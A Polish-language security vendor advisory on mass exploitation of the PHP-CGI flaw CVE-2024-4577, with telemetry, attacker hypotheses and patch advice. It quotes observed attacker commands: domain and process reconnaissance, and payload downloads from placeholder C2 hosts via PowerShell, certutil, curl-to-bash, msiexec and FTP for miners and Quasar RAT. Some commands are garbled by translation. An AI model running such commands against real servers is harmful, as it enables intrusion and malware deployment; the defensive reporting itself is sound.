Porada techniczna: masowe wykorzystanie CVE-2024-4577

Bitdefender Labs śledzi nowe kampanie, ponieważ aktorzy zagrożeń wykorzystują lukę, którą po raz pierwszy zauważono czerwcu 2024 r. Bitdefender wydał krytyczne ostrzeżenie dotyczące bezpieczeństwa dotyczące CVE-2024-4577, poważnej luki w zabezpieczeniach polegającej na wstrzykiwaniu argumentów w PHP, która wpływa na systemy oparte na systemie Windows działające w trybie CGI. Ta luka umożliwiała zdalnym atakującym wykonywanie dowolnego kodu poprzez manipulowanie konwersjami kodowania znaków.

CVE-2024-4577 – poważne cyberzagrożenie

Wyobraź sobie, że masz tłumacza, który za bardzo chce Ci pomóc. Dajesz mu wiadomość, a on próbuje upewnić się, że idealnie pasuje do języka, którego chcesz, nawet jeśli oznacza to zmianę części oryginalnej wiadomości. To właśnie dzieje się w przypadku CVE-2024-4577. Windows, gdy uruchamia PHP w określony sposób (tryb CGI), ma funkcję, która próbuje „przetłumaczyć” znaki na najbliższe dopasowanie, jeśli ich nie rozpoznaje. Atakujący ostrożnie wybiera znaki, które, gdy Windows je „przetłumaczy”, zamieniają się w coś zupełnie innego – na przykład instrukcje wykonania kodu na zdalnej maszynie. Chociaż techniczna natura CVE-2024-4577 obejmuje konwersje kodowania znaków, które są często wyzwalane przez wielobajtowe zestawy znaków powszechne w językach azjatyckich, kluczowe jest zrozumienie, że ta luka w zabezpieczeniach nie ogranicza się do tych regionów.

Od czasu pierwszego ostrzeżenia od zespołu Bitdefender liczba prób wykorzystania luk stale rośnie. Dane telemetryczne wskazują na znaczny wzrost w ciągu ostatniego miesiąca. Bitdefender zaobserwował znaczną koncentrację wykryć wykorzystania luk na Tajwanie (54,65%) i w Hongkongu (27,06%), ale także znaczącą aktywność w innych krajach, w tym w Brazylii (16,39%), Japonii (1,57%) i Indiach (0,33%).

Nietypowa walka zapór o kontrolę

Podczas analizy wykorzystania luki CVE-2024-4577 pracownicy Bitdefender Labs zaobserwowali ciekawy schemat: próby modyfikacji konfiguracji zapory sieciowej na podatnych serwerach, w szczególności w celu zablokowania dostępu do znanych złośliwych adresów IP powiązanych z wykorzystaniem luki.

Przykłady:

• („cmd.exe /s /c” powershell New-NetFirewallRule -DisplayName BLOCK-OUT-<anonimowy_adres_IP> -Direction Outbound -Action Block -RemoteAddress <anonimowy_adres_IP> -Protocol Any -Verbose”) (blokuje połączenia wychodzące do (oldschool[.]best server))”
• („cmd.exe /s /c „powershell New-NetFirewallRule -DisplayName BLOCK-IN-<anonimowy_adres_IP> -Direction Inbound -Action Block -RemoteAddress <anonimowy_adres_IP> -Protocol Any -Verbose”) (blokuje połączenia przychodzące z serwera wydobywającego Monero)
• (cmd.exe /s /c „netsh advfirewall firewall add rule name=Block”) (tworzy regułę bez określonej konfiguracji)

Chociaż nie możemy jednoznacznie określić dokładnej przyczyny – w przeciwieństwie do badań kryminalistycznych przedstawianych w popularnych mediach – Bitdefender ma kilka hipotez.

1. Rywalizacja w zakresie cryptojackingu (najbardziej prawdopodobne): Najbardziej prawdopodobnym wyjaśnieniem jest to, że rywalizujące grupy cryptojackingu toczą walkę o kontrolę nad naruszonymi serwerami. Hipoteza ta jest zgodna z wcześniejszymi obserwacjami innych grup, m.in. operatorami cryptojackingu, takimi jak praktyka grupy LemonDuck polegająca na eliminowaniu konkurencyjnego oprogramowania do kopania kryptowalut. Potwierdza to fakt, że niektóre z zablokowanych adresów IP są znane z tego, że są powiązane z oprogramowaniem do kopania kryptowaluty Monero.

2. Zdalne zarządzanie serwerem (możliwe, ale ryzykowne): Inną możliwością jest to, że administratorzy systemu wykorzystują exploit do zdalnego zarządzania serwerami i wdrażania środków obronnych. Hipoteza ta zyskuje na popularności wraz z obserwacją poleceń (git.exe), co sugeruje potencjalne zdalne zarządzanie serwerem. Wykorzystanie samej wykorzystanej luki w zabezpieczeniach do takich działań jest wysoce ryzykowne i budzi obawy dotyczące bezpieczeństwa, ponieważ atakujący mogą również gromadzić informacje do dalszej eksploatacji.

• (cmd.exe /V:ON /E:ON /D /C (git log –pretty=format:’%s’ -n 1) 1>”C:\php\temp\sf_proc_00.out” 2>”C:\php\temp\sf_proc_00.err”)
• (cmd.exe /V:ON /E:ON /D /C (git describe –tags –abbrev=0) 1>”C:\php\temp\sf_proc_00.out” 2>”C:\php\temp\sf_proc_00.err”)
• (polecenie /V:ON /E:ON /D /C (git config –get remote.origin.url) 1>”C:\php\temp\sf_proc_00.out” 2>”C:\php\temp\sf_proc_00.err”)

3. Działanie samosądu (mało prawdopodobne): Ostatnia hipoteza jest taka, że jednostki lub grupy działają jako samosądy, próbując zakłócić eksploatację podatnych serwerów. Jest to jednak mało prawdopodobne, ponieważ zaobserwowane przez nas modyfikacje zapory blokują określone adresy IP, ale nie rozwiązują problemu podatności.

Awaria telemetrii i statystyki

Analizując te próby wykorzystania luk w zabezpieczeniach, dzielimy się wnioskami z naszych danych wywiadowczych o zagrożeniach, aby wskazać taktyki, techniki i procedury (TTP) atakujących.

1. Początkowy dostęp/automatyczne skrypty

Około 15% wykryć zespołu Bitdefender składa się z podstawowych kontroli podatności. Obejmują one proste polecenia, takie jak whoami lub echo <test_string>, używane do weryfikacji podatności na wykorzystanie. Podczas gdy polecenia te są często kojarzone z atakującymi testującymi dostęp początkowy, mogą być również wykorzystywane przez niebieskie zespoły wykonujące testy penetracyjne lub oceny podatności.

2. Odkrycie ogólne

Kolejne 15% wykryć dotyczy poleceń używanych do rozpoznania systemu. Polecenia te mogą być uruchamiane przez brokerów dostępu początkowego (IAB) w celu udowodnienia wartości zaatakowanego celu lub przez złośliwych aktorów przygotowujących atak.

Cyberprzestępcy wykorzystują techniki „Living Off The Land” (LOTL) do rozpoznania systemu. Korzystanie z wbudowanych narzędzi wiersza poleceń systemu Windows utrudnia wykrywanie i przypisywanie złośliwych działań. Niedawno opublikowaliśmy techniczne wyjaśnienie dotyczące technik LOTL, ponieważ są one obecne w niemal wszystkich incydentach bezpieczeństwa, które badaliśmy.

Te komendy LOTL służą różnym celom rozpoznawczym, w tym:

Wyliczanie procesów: Polecenia takie jak (tasklist.exe) i( wmic.exe) umożliwiają identyfikację uruchomionych procesów, wyszukiwanie oprogramowania zabezpieczającego lub innych cennych celów.

• (cmd.exe /c „lista zadań”)
• (cmd.exe /c „lista zadań /v /fo csv /nh)
• (cmd.exe /s /c „proces wmic pobierz podpis,identyfikator procesu,wiersz poleceń”)
• (cmd.exe /s /c „proces wmic gdzie nazwa=php.exe pobierz ProcessId,CommandLine”)
• (cmd.exe /s /c „wmic ścieżka Win32_PerfFormattedData_PerfProc_Process pobierz nazwę,IDProcess,PercentProcessorTime”)
• Odkrywanie sieci: Polecenia takie jak (netstat.exe) lub (netsh.exe) służą do mapowania połączeń sieciowych, identyfikowania otwartych portów i potencjalnych kanałów komunikacyjnych.
• (cmd.exe /s /c „netstat -ano | findstr :443”)
• (cmd.exe /c „ipconfig /all”)
• (cmd.exe /c „netsh firewall pokaż konfigurację”)

Informacje o użytkownikach i domenach: Polecenia takie jak (net.exe) lub (nltest.exe) służące do wykrywania kont użytkowników, grup uprzywilejowanych i powiązań domenowych.

• (cmd.exe /c „grupa sieciowa „administratorzy domeny” /domena”)
• (cmd.exe /s /c „użytkownik sieci”)
• (cmd.exe /c „nltest /domain_trusts”)

Zbieranie informacji o systemie: Polecenia takie jak (systeminfo.exe) lub (wmic.exe) umożliwiają uzyskanie ogólnych informacji o systemie.

(cmd.exe /c „informacje o systemie”)

(cmd.exe /c „wmic os get OSArchitecture”)

3. Kryptokradzież

Kryptojacking, w którym atakujący wykorzystują zasoby Twojego serwera do wydobywania kryptowaluty, jest powszechną taktyką. Ta taktyka jest szczególnie atrakcyjna ze względu na jej potencjał do generowania pasywnego dochodu, ponieważ serwery, zwłaszcza te publicznie dostępne, często mają znaczne zasoby obliczeniowe i wysoki czas sprawności.

XMRig

Telemetria Bitdefneder pokazuje, że około 5% wykrytych ataków wykorzystuje XMRig, powszechnie używaną koparkę kryptowalut typu open source. Ta koparka jest popularna z kilku powodów. Po pierwsze, XMRig jest przeznaczony do kopania na CPU, co pozwala atakującym wykorzystywać zasoby serwera bez potrzeby dedykowanego sprzętu GPU. Po drugie, koncentruje się na kopaniu Monero (XMR), kryptowaluty znanej z solidnych funkcji prywatności, która pomaga cyberprzestępcom unikać śledzenia.

Atakujący często wykorzystują podatny sterownik Winring0x64, aby ukryć obecność oprogramowania do kopania kryptowalut. Ten sterownik, gdy zostanie wykorzystany, pozwala złośliwym procesom działać z podwyższonymi uprawnieniami, pozostając jednocześnie ukrytymi przed typowymi narzędziami do monitorowania systemu.

Bitdefneder zaobserwował różne metody dostarczania XMRig, w tym:

• Pobieranie sterownika winrig.sys przy użyciu programu PowerShell: (cmd.exe /s /c \”powershell Invoke-WebRequest -Uri http://<C2_IP>/winrig.sys -OutFile winrig.sys\”)
• Pobieranie sterownika za pomocą curl: (cmd.exe /s /c \”curl -o winrig.sys http://<C2_IP>/winrigs.sys\\”)
• Pobieranie programu górniczego z koreańskiego serwera za pomocą curl i uruchamianie go za pomocą bash: (cmd.exe /s /c „curl -fsSL http://<C2_IP>:8080/Wuck/mq.txt |bash”)

Nicehash

Inna mniejsza kampania obejmowała wdrożenie koparek Nicehash, platformy, która pozwala użytkownikom sprzedawać moc obliczeniową za kryptowalutę. Proces koparki był maskowany jako legalna aplikacja, taka jak (javawindows.exe), aby uniknąć wykrycia.

Przykład wiersza poleceń wykonania: (cmd.exe /c javawindows.exe -o <anonimowy_adres_IP_puli_górniczej> -u aa -p aa –tls –nicehash –cpu-no-yield –huge-pages-jit –randomx-mode=fast –background –algo=rx/0 -k)

4. Zdalne sterowanie, dystrybucja botnetów i proste pobieranie

Oprócz cryptojackingu nasza analiza pokazuje wiele innych metod ataków na wdrażanie złośliwego oprogramowania. Podczas gdy niektórzy atakujący natychmiast wdrażają kryptominery po wykorzystaniu CVE-2024-4577, bardziej niebezpieczny scenariusz obejmuje podmioty powiązane z ransomware.

Jak wyjaśnia dokument Bitdefender Ransomware Whitepaper, ataki ransomware są często operacjami wieloetapowymi. Początkowy dostęp, uzyskany za pośrednictwem luki w zabezpieczeniach, takiej jak CVE-2024-4577 lub innymi środkami, jest tylko pierwszym krokiem w złożonym ataku. Opóźnienie między początkowym dostępem a wdrożeniem ransomware jest kluczową cechą wielu współczesnych kampanii ransomware, podkreślając potrzebę ciągłego monitorowania i proaktywnego polowania na zagrożenia.

Bitdefender wykrył wdrożenie narzędzi zdalnego dostępu, typową taktykę ustanawiania początkowego dostępu. Ten dostęp jest zazwyczaj ustanawiany przez podmioty powiązane z ransomware lub, częściej, przez brokerów dostępu początkowego, którzy następnie sprzedają go tym, którzy zaoferują najwięcej na podziemnych rynkach.

Quasar RAT

Ten open-source RAT zapewnia atakującym szeroki zakres możliwości, w tym zdalne wykonywanie poleceń, przesyłanie plików, rejestrowanie naciśnięć klawiszy i przechwytywanie ekranu. W tej kampanii Quasar został wdrożony przy użyciu skryptów wsadowych, które pobierają RAT ze znanych serwerów poleceń i kontroli (C2). Skrypty te używały wbudowanych narzędzi systemu Windows, takich jak (powershell.exe) i (certutil.exe) (LOTL), aby uniknąć wykrycia.

• (cmd.exe /s /c „powershell Invoke-WebRequest -Uri http://<C2_IP>/antivirus.cmd -OutFile antivirus.cmd”)
• (cmd.exe /s /c „certutil.exe -urlcache -split -f http://<C2_IP>/antivirus.cmd antivirus.cmd”)

Instalacje MSI

Innym przykładem polegania na technikach LOTL są przypadki, w których msiexec.exe (Windows Installer) został użyty do bezpośredniego wdrożenia na zainfekowanym serwerze. Złośliwy instalator MSI został rozprowadzony z adresu IP serwera C2, o którym wiadomo, że jest zaangażowany w operacje botnetu, co sugeruje próbę rekrutacji zainfekowanych systemów do istniejącej sieci botnetu.

• (cmd.exe /c \”msiexec /q /i http://<C2_IP>/5118.msi)

Pobieranie FTP

Użycie pobierania FTP z domen takich jak (oldschool[.]best) stanowi prostszą, ale nadal skuteczną metodę dostarczania ładunków. Często wykonywany wiersz poleceń zawierał wykonanie whoami na początku, a następnie wykonanie skryptu PHP, który został pobrany z serwera ftp.

• (cmd.exe /s /c „whoami & curl -O fxp://irc2[.]oldschool[.]best/dyn[.]php & php dyn.php)

Zalecenia od zespołu Bitdefender

Bitdefender stale monitoruje wykrywanie aktywności związanej z exploitami CVE-2024-4577. Zespół programistów PHP wydał poprawki, aby rozwiązać tę lukę.
Użytkownikom zaleca się uaktualnienie do najnowszych wersji poprawek PHP – PHP 8.3.8, PHP 8.2.20 i PHP 8.1.29, które zawierają poprawki dla tej luki. Wszelkie wersje wcześniejsze należy uznać za podatne, zwłaszcza gałęzie, które nie są już obsługiwane, takie jak PHP 8.0, PHP 7 i PHP 5.

Devcore stwierdza, że implementacje CGI mogą być problematyczne ze względu na swój wiek i zaleca rozważenie innych bezpiecznych architektur, takich jak Mod-PHP, FastCGI lub PHP-FPM.

Biorąc pod uwagę obecny trend atakowania luk, zalecamy włączenie zaawansowanej kontroli zagrożeń (ATC) Bitdefender, części naszej warstwy ochrony procesów, na Twoich serwerach. ATC wykorzystuje zaawansowaną analizę behawioralną i uczenie maszynowe, aby proaktywnie wykrywać i blokować podejrzane działania procesów, zapewniając krytyczną obronę w czasie rzeczywistym przed nieznanymi zagrożeniami i próbami wykorzystania luk.

Ponieważ w większości kampanii wykorzystano narzędzia LOTL, organizacje powinny rozważyć ograniczenie korzystania z narzędzi takich jak PowerShell w ramach danego środowiska wyłącznie do użytkowników uprzywilejowanych, na przykład administratorów.

Jeśli chcesz dowiedzieć się, jakie możliwości zapewnią Ci produkty antywirusowe z linii Bitdefender GravityZone, to sprawdź tę stronę.